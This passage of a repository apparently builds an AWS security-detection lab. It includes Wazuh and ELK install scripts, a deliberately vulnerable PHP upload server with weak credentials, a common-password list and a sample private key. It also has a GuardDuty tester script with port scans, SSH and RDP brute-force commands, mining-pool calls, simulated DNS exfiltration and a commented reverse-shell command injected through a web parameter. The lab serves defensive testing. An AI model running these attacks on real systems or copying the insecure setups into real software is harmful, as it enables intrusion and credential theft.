    if command -v systemctl >/dev/null; then
        systemctl daemon-reload > /dev/null 2>&1
        systemctl enable kibana.service > /dev/null 2>&1
        systemctl start kibana.service > /dev/null 2>&1
    ## Check for SysV
    elif command -v service >/dev/null; then
        chkconfig --add kibana > /dev/null 2>&1
        chkconfig kibana on > /dev/null 2>&1
        service kibana start > /dev/null 2>&1
    fi
}

disable_elastic_repository() {
    # Disable the Elasticsearch repository
    # It is recommended that the Elasticsearch repository be disabled in order to prevent an upgrade to a newer
    # Elastic Stack version, which could undo the changes made by the Wazuh App.

    ## RHEL/CentOS/Fedora based OS
    if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then
        sed -i "s/^enabled=1/enabled=0/" ${ELASTIC_REPO_FILE}
    else
        sed -i "s/^deb/#deb/" ${ELASTIC_REPO_FILE}
        ${PKG_MANAGER} update
    fi
}

configure_wazuh_api() {
    # Set up Wazuh API parameters
    API_PROTOCOL=${API_PROTOCOL:-http}
    HOSTNAME=${HOSTNAME:-"$(hostname -f)"}
    API_SERVER=${API_SERVER:-"localhost"}
    API_URL=${API_PROTOCOL}://${API_SERVER}
    API_PORT=${API_PORT:-55000}
    API_USER=${API_USER:-wazuh}
    API_PASS=${API_PASS:-wazuh}
    API_PASS_BASE64=$(echo -n ${API_PASS} | base64)
    ES_URL=${ES_URL:-'http://localhost:9200'}
    ES_USER=${ES_USER:-kibana}
    ES_PASSWORD=${ES_PASSWORD:-changeme}
    ES_QUERY="curl -u ${ES_USER}:${ES_PASSWORD} -XGET ${ES_URL}"
    # Wait until Elasticsearch is up and running.
    wait_elastic_component "${ES_QUERY}"
    echo -e "\nSetting Wazuh API credentials into the Wazuh Kibana application"
    # The Wazuh Kibana application configuration is the document with the ID 1513629884013, don't change that!
    # Note that the API password is only base64-encoded here, not encrypted; anyone who can read the .wazuh index can recover it.
    curl -s -u ${ES_USER}:${ES_PASSWORD} -XPOST "${ES_URL}/.wazuh/wazuh-configuration/1513629884013" -H 'Content-Type: application/json' -H "Accept: application/json" -d'
    {
      "api_user": "'${API_USER}'",
      "api_password": "'${API_PASS_BASE64}'",
      "url": "'${API_URL}'",
      "api_port": "'${API_PORT}'",
      "insecure" : "true",
      "component" : "API",
      "cluster_info" : {
        "manager" : "'${HOSTNAME}'",
        "cluster" : "Disabled",
        "status" : "disabled",
        "node" : "node01"
      },
      "extensions" : {
        "audit" : true,
        "pci" : true,
        "gdpr" : true,
        "oscap" : true,
        "ciscat" : false,
        "aws" : false,
        "virustotal" : false
      }
    }
    '
    wait_elastic_component ${ES_QUERY}
}

configure_kibana() {
    # Kibana settings
    KIBANA_BASE_URL='localhost:5601'
    KIBANA_USER='elastic'
    KIBANA_PASSWORD='changeme'

    check_kibana_service_availability="curl -u ${KIBANA_USER}:${KIBANA_PASSWORD} -XGET ${KIBANA_BASE_URL}"

    # Wait until Kibana service is available.
    wait_elastic_component "${check_kibana_service_availability}"
    check_kibana_status="${check_kibana_service_availability} --fail"
    wait_elastic_component "${check_kibana_status}"
    echo "Kibana is up"

    KIBANA_INDEX_URL="${KIBANA_BASE_URL}/api/kibana/settings/defaultIndex"

    # Set default kibana index to wazuh alerts
    curl --fail -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" -d '{"value":"wazuh-alerts-3.x-*"}' "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_INDEX_URL}"

    # Import AWS Detonation lab dashboards
    KIBANA_DASHBOARDS_URL="${KIBANA_BASE_URL}/api/kibana/dashboards/import"
    curl -sO https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/master/KibanaAdditionalConfigs/Kibana-Visualizations.json
    curl -sO https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/master/KibanaAdditionalConfigs/Kibana-Dashboard.json
    curl -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_DASHBOARDS_URL}" -d @Kibana-Dashboard.json
    curl -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_DASHBOARDS_URL}" -d @Kibana-Visualizations.json
}

main() {
    set_global_parameters
    install_dependencies
    add_nodejs_repository
    add_wazuh_repository
    install_wazuh
    setup_wazuh_api
    add_custom_config
    install_java
    add_elastic_repository
    install_elastic
    install_logstash
    install_kibana
    disable_elastic_repository
    configure_wazuh_api
    configure_kibana
}

main

#######################################
# next step is to configure wazuh
## https://documentation.wazuh.com/current/installation-guide/installing-elastic-stack/connect_wazuh_app.html
--------------------------------------------------------------------------------
/additionalInstallationScripts/installWazuhAgent.ps1:
--------------------------------------------------------------------------------
# Download agent
$url = "https://packages.wazuh.com/3.x/windows/wazuh-agent-3.8.2-1.msi"
$output = "C:\Users\Administrator\Desktop\wazuh-agent-3.8.2-1.msi"
Invoke-WebRequest -Uri $url -OutFile $output

$wazuh_manager = "172.16.0.21"

# install agent and register agent
C:\Users\Administrator\Desktop\wazuh-agent-3.8.2-1.msi /q ADDRESS=$wazuh_manager

$wazuh_path = "C:\Program Files (x86)\ossec-agent"
$agent_auth_path = "$wazuh_path\agent-auth.exe"

# wait until the wazuh agent is installed, i.e. the ossec-agent directory exists
do {
    Write-Output "Wazuh agent is still not installed"
    Start-Sleep 10
} while (![System.IO.File]::Exists($agent_auth_path))

Write-Output "Wazuh agent is installed"

$n_retries = 0   # number of times the agent has attempted to register
$max_retries = 5 # maximum number of allowed attempts

do {
    $agent_auth = Start-Process -FilePath $agent_auth_path -ArgumentList "-m $wazuh_manager -A windowsVictim" -WorkingDirectory $wazuh_path -PassThru
    Wait-Process -InputObject $agent_auth
    $n_retries++
    if ($agent_auth.ExitCode -ne 0) {
        Write-Output "Could not register agent. Sleeping for 10 seconds."
        Start-Sleep 10
    }
} while ($agent_auth.ExitCode -ne 0 -and $n_retries -le $max_retries)

$final_msg = If ($n_retries -le $max_retries) {"Agent registered with manager $wazuh_manager"} Else {"Agent registration failed after $max_retries retries"}
Write-Output $final_msg

Restart-Service -Name wazuh
--------------------------------------------------------------------------------
/additionalInstallationScripts/installWazuhAgent.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# install wazuh agent
# Wazuh documentation - https://documentation.wazuh.com/current/installation-guide/installing-wazuh-agent/wazuh_agent_rpm.html#wazuh-agent-rpm
#######################################
#sleep timer for if you want this script to run on instance creation. the server takes 5+ minutes to install.
#sleep 10m

WAZUH_VERSION=3.8
WAZUH_PATCH=$WAZUH_VERSION.2
WAZUH_PACKAGE=$WAZUH_PATCH-1

# Adding the Wazuh repository
cat > /etc/yum.repos.d/wazuh.repo <<\EOF
[wazuh_repo]
gpgcheck=1
gpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH
enabled=1
name=Wazuh repository
baseurl=https://packages.wazuh.com/3.x/yum/
protect=1
EOF

# Installing Wazuh agent
yum install wazuh-agent-$WAZUH_PACKAGE -y -q -e 0

# register agent
MANAGER_IP="172.16.0.21"

# Enrolment here is unauthenticated (no -P password / no TLS verification of the manager),
# which is acceptable only because the lab VPC is isolated; keep retrying until the manager answers
until /var/ossec/bin/agent-auth -m $MANAGER_IP; do
    echo "Wazuh manager is unavailable - sleeping for 5 seconds"
    sleep 5
done

# set up manager ip in the ossec.conf file before restarting
sed -i "s/MANAGER_IP/$MANAGER_IP/" /var/ossec/etc/ossec.conf

service wazuh-agent restart

echo "Agent successfully registered"
--------------------------------------------------------------------------------
/additionalInstallationScripts/setupVunlerableWebServer.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# install apps for attack
sudo yum install ncat -y -q -e 0
sudo yum install nc -y -q -e 0

# Install Apache
sudo yum install httpd -y -q -e 0
sudo service httpd start

# Install MySQL
sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm
sudo yum install mysql-server -y -q -e 0
sudo service mysqld start

#sudo /usr/bin/mysql_secure_installation
#
# Automate mysql secure installation (originally written for Debian-based systems)
#
# - You can set a password for root accounts.
# - You can remove root accounts that are accessible from outside the local host.
# - You can remove anonymous-user accounts.
# - You can remove the test database (which by default can be accessed by all users, even anonymous users),
#   and privileges that permit anyone to access databases with names that start with test_.
# For details see documentation: http://dev.mysql.com/doc/refman/5.7/en/mysql-secure-installation.html
#
# @version 13.08.2014 00:39 +03:00
# Tested on Debian 7.6 (wheezy)
#
# Usage:
#   Setup mysql root password: ./mysql_secure.sh 'your_new_root_password'
#   Change mysql root password: ./mysql_secure.sh 'your_old_root_password' 'your_new_root_password'
#

# Delete package expect when script is done
# 0 - No;
# 1 - Yes.
PURGE_EXPECT_WHEN_DONE=0

#
# Check the bash shell script is being run by root
#
# if [[ $EUID -ne 0 ]]; then
#   echo "This script must be run as root" 1>&2
#   exit 1
# fi

#
# Check input params
#
# if [ -n "${1}" -a -z "${2}" ]; then
#   # Setup root password
#   CURRENT_MYSQL_PASSWORD=''
#   NEW_MYSQL_PASSWORD="${1}"
# elif [ -n "${1}" -a -n "${2}" ]; then
#   # Change existing root password
#   CURRENT_MYSQL_PASSWORD="${1}"
#   NEW_MYSQL_PASSWORD="${2}"
# else
#   echo "Usage:"
#   echo "  Setup mysql root password: ${0} 'your_new_root_password'"
#   echo "  Change mysql root password: ${0} 'your_old_root_password' 'your_new_root_password'"
#   exit 1
# fi


# Setup root password (deliberately weak: this host is the lab's vulnerable target)
CURRENT_MYSQL_PASSWORD=''
NEW_MYSQL_PASSWORD="master"

#
# Check whether the expect package is installed.
# The original dpkg-query check never matched on this yum-based host; rpm -q is the equivalent here.
#
if ! rpm -q expect > /dev/null 2>&1; then
    echo "Can't find expect. Trying to install it..."
    yum install expect -y -q -e 0
fi

SECURE_MYSQL=$(expect -c "
set timeout 3
spawn mysql_secure_installation
expect \"Enter current password for root (enter for none):\"
send \"$CURRENT_MYSQL_PASSWORD\r\"
expect \"root password?\"
send \"y\r\"
expect \"New password:\"
send \"$NEW_MYSQL_PASSWORD\r\"
expect \"Re-enter new password:\"
send \"$NEW_MYSQL_PASSWORD\r\"
expect \"Remove anonymous users?\"
send \"y\r\"
expect \"Disallow root login remotely?\"
send \"y\r\"
expect \"Remove test database and access to it?\"
send \"y\r\"
expect \"Reload privilege tables now?\"
send \"y\r\"
expect eof
")

#
# Execute mysql_secure_installation
#
# echo "${SECURE_MYSQL}"
#
# if [ "${PURGE_EXPECT_WHEN_DONE}" -eq 1 ]; then
#   # Uninstalling expect package
#   yum remove expect -y -q -e 0
# fi


# Install PHP
sudo yum install php php-mysql -y -q -e 0
sudo yum install php-* -y -q -e 0

# set services to start on boot
sudo chkconfig httpd on
sudo chkconfig mysqld on

# setup first php page
cat > /var/www/html/info.php <<\EOF


EOF

#make vulnerable php index
cat > /var/www/html/index.php <<\EOF


EOF

#make html file upload page
cat > /var/www/html/index.html <<\EOF




147 | Select image to upload: 148 | 149 | 150 |
151 | 152 | 153 | 154 | EOF 155 | 156 | #make file upload php 157 | cat > /var/www/html/upload.php <<\EOF 158 | 500000) { 181 | echo "Sorry, your file is too large."; 182 | $uploadOk = 0; 183 | } 184 | // Allow certain file formats 185 | if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg" 186 | && $imageFileType != "gif" ) { 187 | echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed."; 188 | $uploadOk = 0; 189 | } 190 | // Check if $uploadOk is set to 0 by an error 191 | if ($uploadOk == 0) { 192 | echo "Sorry, your file was not uploaded."; 193 | // if everything is ok, try to upload file 194 | } else { 195 | if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 196 | echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; 197 | } else { 198 | echo "Sorry, there was an error uploading your file."; 199 | } 200 | } 201 | ?> 202 | EOF 203 | 204 | #make upload directory 205 | mkdir -p /var/www/html/uploads 206 | 207 | #add apache to wheel because we want bad things to happen 208 | usermod -aG wheel apache 209 | 210 | # restart web service 211 | sudo service httpd restart -------------------------------------------------------------------------------- /artifacts/banner_message.txt: -------------------------------------------------------------------------------- 1 | 2 | ############################################################################### 3 | # ____ _ _ # 4 | # | __ ) __ _ ___| |_(_) ___ _ __ # 5 | # | _ \ / _` / __| __| |/ _ \| '_ \ # 6 | # | |_) | (_| \__ \ |_| | (_) | | | | # 7 | # |____/ \__,_|___/\__|_|\___/|_| |_| # 8 | #-----------------------------------------------------------------------------# 9 | # Authorized access only! # 10 | # Disconnect IMMEDIATELY if you are not an authorized user!!! # 11 | # All actions will be monitored and recorded. 
12 | ###############################################################################
13 | 
--------------------------------------------------------------------------------
/artifacts/never_used_sample_key.foo:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEowIBAAKCAQEAhXi8JHSHWcETzpLkOYvgycYkgNnvEhRe+IUJ2VyAMwOrvOdu0UbTrMtk9GjY
3 | 7K/RsADsugvdunWBDBm5gT2GG5PgEbrj45ae0nzT6kHgSZcVJ98KQHBOCXPYIo+hHA5aicRG9khb
4 | xqrXo0rJkv9PFl/guNdUdDAp9vRY9KAylGoVC1TgZGpC8q3nyZt/3WK99puI2EdOEOY0E6mO+4tc
5 | tlKe5wCxkGzhndUezPvIxW3rilja0OZbvZ6xj0rWKGJguUm1ODjO/hGOUsbcQpQ1RMrNdXtrnnsQ
6 | ttHP5KHC+BrQhDKePtuVpqeu/pqqLXsH7xHf7tN71PaLzmXDfJ8YiwIDAQABAoIBADGrlbCnYPto
7 | 2/sjNSWpRXUxdMIy2EJNLG6l691lDBxwAEhjhB0Dk6CZbK98GUYzxAAQyAgQhGpwch7Tr/JFuBOp
8 | O1i9yTMYCXDhnWdvLo2UWP4mhcUnRhNEdimec+FiAhWE4reig+zyBR+ypEM9GeyEr7d6AubeSa+q
9 | jTQ0Lb6HFhjXY+ZycmJcYAgpuO1kaftjnSzETZB0aFJZqy+VpEGMdRxy+3sErXu3W17GFvpx+8KP
10 | 6aocjkm+9LCPQmsQ8KJRzzrT8Tr74/lYjBPhkqUnTUfb/tWUY3fJ55uYZjgjhS8Fc3yfbdZevCqG
11 | KFoxJR7SoSuRSz+yGF4nSg0PTtECgYEAwvwsfpeHiuhcJsbnahVEZ9Ky26KG+49MHJChqkS9UDEh
12 | WmG8VI08XnZk6i4cxexlkTjy+8npF3omssm/zJhEGMrXK3Erll0ykiweSa04LFe8/BC2RUGgHqLY
13 | yEdJAurH26GXXsFRm8zeyfA3C3Kzla73g4sN4jp3Rr0Y9hx4dXMCgYEArzzaw0s6kPFXElJSf3L6
14 | PtcMCJQMD9MGGoGCSbLWyKBvGIfTxIovDEwy56Xrg92WqaUh2ez8shXr9NN2STM1rk/ZwV76CG3Y
15 | mn/PgqJ73YaTrPq94QQ9vQ7jdzgTdurC/kNuKPl7ogSQB4YsFYv1lfW/hiHkCAmkL3k9hGO3SokC
16 | gYEAg0DlYsH2B9eqUKAMHyj5xznaFGcvnh80CPaDHO7w0Q6BeSnZcMEyJhRkkg9AZyteo4dGaZ/d
17 | PGSJsEiGx96n2FiSxzeDM9DAvgzcxpPIAHF/Ud6eE7i9ZGISs57o0wHgT0RTdQGFQe+C+USuiRJJ
18 | OTVygCYWzna02/Vm3CUGIWkCgYAey4XyPf0rzY2spZTj2tPJSUdPFp1MBpyS+eFojCoclb0QRYZc
19 | iqAb/CQR+2F5Ce7ZHzDkuDXsIdgWbTbjREGRwWyWA9fStWMUO5O+9EjqNCUth97odTNYTw6AO/WH
20 | t1fPERCB2N32KfEZsWV7392nnckrjDcjhnY49YhvBIsIaQKBgE5w2DBPEF3MaZdmmcXqb6UBJXy6
21 | F4hNFhlGr3Y11f7u6rY3sYl6EkvLDPPg8CUKgtEPCKwoACCVHdtTZ42RXRVgzwhY3kRNQM1WneKM
22 | W1rsM0jS6Ayo+dLs0U7LhdRcEKPHsw9bJau3Nr5mm+sjC791nj4wUEctYWFuh0idgTk7
23 | -----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/artifacts/password_list.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | password
3 | 12345678
4 | 1234
5 | 12345
6 | dragon
7 | qwerty
8 | 696969
9 | mustang
10 | letmein
11 | baseball
12 | master
13 | michael
14 | football
15 | shadow
16 | monkey
17 | abc123
18 | pass
19 | 6969
20 | jordan
21 | harley
22 | ranger
23 | iwantu
24 | jennifer
25 | hunter
26 | 2000
27 | test
28 | batman
29 | trustno1
30 | thomas
31 | tigger
32 | robert
33 | access
34 | love
35 | buster
36 | 1234567
37 | soccer
38 | hockey
39 | killer
40 | george
41 | sexy
42 | andrew
43 | charlie
44 | superman
45 | dallas
46 | jessica
47 | pepper
48 | 1111
49 | austin
50 | william
51 | daniel
52 | golfer
53 | summer
54 | heather
55 | hammer
56 | yankees
57 | joshua
58 | maggie
59 | biteme
60 | enter
61 | ashley
62 | thunder
63 | cowboy
64 | silver
65 | richard
66 | orange
67 | merlin
68 | michelle
69 | corvette
70 | bigdog
71 | cheese
72 | matthew
73 | 121212
74 | patrick
75 | martin
76 | freedom
77 | ginger
78 | nicole
79 | sparky
80 | yellow
81 | camaro
82 | secret
83 | falcon
84 | taylor
85 | 111111
86 | 131313
87 | 123123
88 | hello
89 | scooter
90 | please
91 | porsche
92 | guitar
93 | chelsea
94 | black
95 | diamond
96 | nascar
97 | jackson
98 | cameron
99 | 654321
100 | computer
101 | amanda
102 | wizard
103 | xxxxxxxx
104 | money
105 | phoenix
106 | mickey
107 | bailey
108 | knight
109 | iceman
110 | tigers
111 | purple
112 | andrea
113 | dakota
114 | aaaaaa
115 | player
116 | sunshine
117 | morgan
118 | starwars
119 | boomer
120 | cowboys
121 | edward
122 | charles
123 | girls
124 | booboo
125 | coffee
126 | xxxxxx
127 | bulldog
128 | ncc1701
129 | rabbit
130 | peanut
131 | john
132 | johnny
133 | gandalf
134 | spanky
135 | winter
136 | brandy
137 | compaq
138 | carlos
139 | tennis
140 | james
141 | mike
142 | brandon
143 | fender
144 | anthony
145 | ferrari
146 | cookie
147 | chicken
148 | maverick
149 | chicago
150 | joseph
151 | diablo
152 | 666666
153 | willie
154 | welcome
155 | chris
156 | panther
157 | yamaha
158 | justin
159 | banana
160 | driver
161 | marine
162 | angels
163 | fishing
164 | david
165 | maddog
166 | hooters
167 | wilson
168 | butthead
169 | dennis
170 | captain
171 | chester
172 | smokey
173 | xavier
174 | steven
175 | viking
176 | snoopy
177 | blue
178 | eagles
179 | winner
180 | samantha
181 | house
182 | miller
183 | flower
184 | jack
185 | firebird
186 | butter
187 | united
188 | turtle
189 | steelers
190 | tiffany
191 | zxcvbn
192 | tomcat
193 | golf
194 | bond007
195 | bear
196 | tiger
197 | doctor
198 | gateway
199 | gators
200 | angel
201 | junior
202 | thx1138
203 | badboy
204 | debbie
205 | spider
206 | melissa
207 | booger
208 | 1212
209 | flyers
210 | fish
211 | matrix
212 | teens
213 | scooby
214 | jason
215 | walter
216 | boston
217 | braves
218 | yankee
219 | lover
220 | barney
221 | victor
222 | tucker
223 | princess
224 | mercedes
225 | 5150
226 | doggie
227 | zzzzzz
228 | gunner
229 | horney
230 | bubba
231 | 2112
232 | fred
233 | johnson
234 | xxxxx
235 | member
236 | donald
237 | jackie
238 | monica
239 | midnight
240 | college
241 | baby
242 | brian
243 | mark
244 | startrek
245 | sierra
246 | leather
247 | 232323
248 | 4444
249 | beavis
250 | happy
251 | sophie
252 | ladies
253 | naughty
254 | giants
255 | blonde
256 | golden
257 | dolphins
258 | 
--------------------------------------------------------------------------------
/attacks/README.md:
--------------------------------------------------------------------------------
1 | placeholder
2 | 
--------------------------------------------------------------------------------
/attacks/guardduty_tester.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License").
5 | # You may not use this file except in compliance with the License.
6 | # A copy of the License is located at
7 | #
8 | #     http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # or in the "license" file accompanying this file. This file is distributed
11 | # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
12 | # express or implied. See the License for the specific language governing
13 | # permissions and limitations under the License.
14 | # originally from https://raw.githubusercontent.com/awslabs/amazon-guardduty-tester/master/guardduty_tester.sh
15 | 
16 | 
17 | # load IP addresses created by templates
18 | source localIps.sh
19 | 
20 | # simulate external recon
21 | #echo 'External port probe on a temporarily unprotected port'
22 | 
23 | # 1 - simulate internal recon and attempted lateral movement
24 | echo
25 | echo '***********************************************************************'
26 | echo '* Test #1 - Internal port scanning                                    *'
27 | echo '* This simulates internal reconnaissance by an internal actor or an   *'
28 | echo '* external actor after an initial compromise. This is considered a    *'
29 | echo '* low priority finding for GuardDuty because its not a clear indicator *'
30 | echo '* of malicious intent on its own.                                     *'
31 | echo '***********************************************************************'
32 | echo
33 | sudo nmap -sT $BASIC_LINUX_TARGET
34 | echo
35 | echo '-----------------------------------------------------------------------'
36 | echo
37 | # 2 - ssh brute force with list of keys found on web
38 | echo '***********************************************************************'
39 | echo '* Test #2 - SSH Brute Force with Compromised Keys                     *'
40 | echo '* This simulates an SSH brute force attack on an SSH port that we     *'
41 | echo '* can access from this instance. It uses (phony) compromised keys in  *'
42 | echo '* many subsequent attempts to see if one works. This is a common      *'
43 | echo '* technique where the bad actors will harvest keys from the web in    *'
44 | echo '* places like source code repositories where people accidentally leave*'
45 | echo '* keys and credentials (This attempt will not actually succeed in     *'
46 | echo '* obtaining access to the target linux instance in this subnet)       *'
47 | echo '***********************************************************************'
48 | echo
49 | for j in `seq 1 10`;
50 | do
51 |     sudo ./crowbar/crowbar.py -b sshkey -s $BASIC_LINUX_TARGET/32 -u ec2-user -k ./compromised_keys;
52 | done
53 | echo
54 | echo '-----------------------------------------------------------------------'
55 | echo
56 | # 3 - rdp brute force with known user and list of passwords found on web
57 | echo '***********************************************************************'
58 | echo '* Test #3 - RDP Brute Force with Password List                        *'
59 | echo '* This simulates an RDP brute force attack on the internal RDP port   *'
60 | echo '* of the windows server that we installed in the environment. It uses *'
61 | echo '* a list of common passwords that can be found on the web. This test  *'
62 | echo '* will trigger a detection, but will fail to get into the target      *'
63 | echo '* windows instance.                                                   *'
64 | echo '***********************************************************************'
65 | echo
66 | echo 'Sending 250 password attempts at the windows server...'
67 | hydra -t 4 -f -l administrator -P ./passwords/password_list.txt rdp://$BASIC_WINDOWS_TARGET
68 | echo
69 | echo '-----------------------------------------------------------------------'
70 | echo
71 | # 4 - CryptoCurrency Activity
72 | echo '***********************************************************************'
73 | echo '* Test #4 - CryptoCurrency Mining Activity                            *'
74 | echo '* This simulates interaction with a cryptocurrency mining pool which  *'
75 | echo '* can be an indication of an instance compromise. In this case, we are*'
76 | echo '* only interacting with the URL of the pool, but not downloading      *'
77 | echo '* any files. This will trigger a threat intel based detection.        *'
78 | echo '***********************************************************************'
79 | echo
80 | echo "Calling bitcoin wallets to download mining toolkits"
81 | curl -s http://com.minergate.pool/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null &
82 | curl -s http://xdn-xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null &
83 | echo
84 | echo '-----------------------------------------------------------------------'
85 | echo
86 | # 5 - DNS Exfiltration
87 | echo '***********************************************************************'
88 | echo '* Test #5 - DNS Exfiltration                                          *'
89 | echo '* A common exfiltration technique is to tunnel data out over DNS      *'
90 | echo '* to a fake domain. Its an effective technique because most hosts     *'
91 | echo '* have outbound DNS ports open. This test wont exfiltrate any data,   *'
92 | echo '* but it will generate enough unusual DNS activity to trigger the     *'
93 | echo '* detection.                                                          *'
94 | echo '***********************************************************************'
95 | echo
96 | echo "Calling large numbers of large domains to simulate tunneling via DNS"
97 | dig -f ./domains/queries.txt > /dev/null &
98 | echo
99 | # 6 - Backdoor:EC2/C&CActivity.B!DNS
100 | echo '***********************************************************************'
101 | echo '* Test #6 - Fake domain to prove that GuardDuty is working            *'
102 | echo '* This is a permanent fake domain that customers can use to prove that*'
103 | echo '* GuardDuty is working. Calling this domain will always generate the  *'
104 | echo '* Backdoor:EC2/C&CActivity.B!DNS finding type                         *'
105 | echo '***********************************************************************'
106 | echo
107 | echo "Calling a well known fake domain that is used to generate a known finding"
108 | dig GuardDutyC2ActivityB.com any
109 | echo
110 | echo '***********************************************************************'
111 | echo '* Test #7 - scan webserver for vulnerabilities                        *'
112 | echo '* This will be used to find a vulnerable server for php attack        *'
113 | echo '***********************************************************************'
114 | echo
115 | #echo "scan webserver for vulnerabilities"
116 | #nikto -h $BASIC_LINUX_TARGET
117 | # ncat -v -n -l -p 6666 &
118 | # curl http://54.210.117.54/index.php?cmd=ncat%20$BASIC_LINUX_TARGET%206666%20-e%20/bin/bash
119 | echo '*****************************************************************************************************'
120 | echo 'Expected GuardDuty Findings'
121 | echo
122 | echo 'Test 1: Internal Port Scanning'
123 | echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is performing outbound port scans against remote host.' $BASIC_LINUX_TARGET
124 | echo 'Finding Type: Recon:EC2/Portscan'
125 | echo
126 | echo 'Test 2: SSH Brute Force with Compromised Keys'
127 | echo 'Expecting two findings - one for the outbound and one for the inbound detection'
128 | echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing SSH brute force attacks against ' $BASIC_LINUX_TARGET
129 | echo 'Inbound: ' $RED_TEAM_IP ' is performing SSH brute force attacks against ' $BASIC_LINUX_INSTANCE
130 | echo 'Finding Type: UnauthorizedAccess:EC2/SSHBruteForce'
131 | echo
132 | echo 'Test 3: RDP Brute Force with Password List'
133 | echo 'Expecting two findings - one for the outbound and one for the inbound detection'
134 | echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_TARGET
135 | echo 'Inbound: ' $RED_TEAM_IP ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_INSTANCE
136 | echo 'Finding Type : UnauthorizedAccess:EC2/RDPBruteForce'
137 | echo
138 | echo 'Test 4: Cryptocurrency Activity'
139 | echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is querying a domain name that is associated with bitcoin activity'
140 | echo 'Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS'
141 | echo
142 | echo 'Test 5: DNS Exfiltration'
143 | echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is attempting to query domain names that resemble exfiltrated data'
144 | echo 'Finding Type : Backdoor:EC2/DNSDataExfiltration'
145 | echo
146 | echo 'Test 6: C&C Activity'
147 | echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is querying a domain name associated with a known Command & Control server.'
148 | echo 'Finding Type : Backdoor:EC2/C&CActivity.B!DNS'
149 | echo
150 | 
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/1-RoyalTSX-requiredDocument.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/1-RoyalTSX-requiredDocument.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/2-RDP-connnectionSettings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/2-RDP-connnectionSettings.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/3-RDP-credentials.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/3-RDP-credentials.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/4-RDP-secureGateway.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/4-RDP-secureGateway.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/5-bastion- credential.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/5-bastion- credential.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/6-bastion-key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/6-bastion-key.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/7-secureGateway-config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/7-secureGateway-config.png
--------------------------------------------------------------------------------
/images/RoyalTSX-Config/8-secureGateway-credentials.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/8-secureGateway-credentials.png
--------------------------------------------------------------------------------
/images/Topology/Topology-All.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-All.png
--------------------------------------------------------------------------------
/images/Topology/Topology-IAM.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-IAM.png
--------------------------------------------------------------------------------
/images/Topology/Topology-Inspector.png:
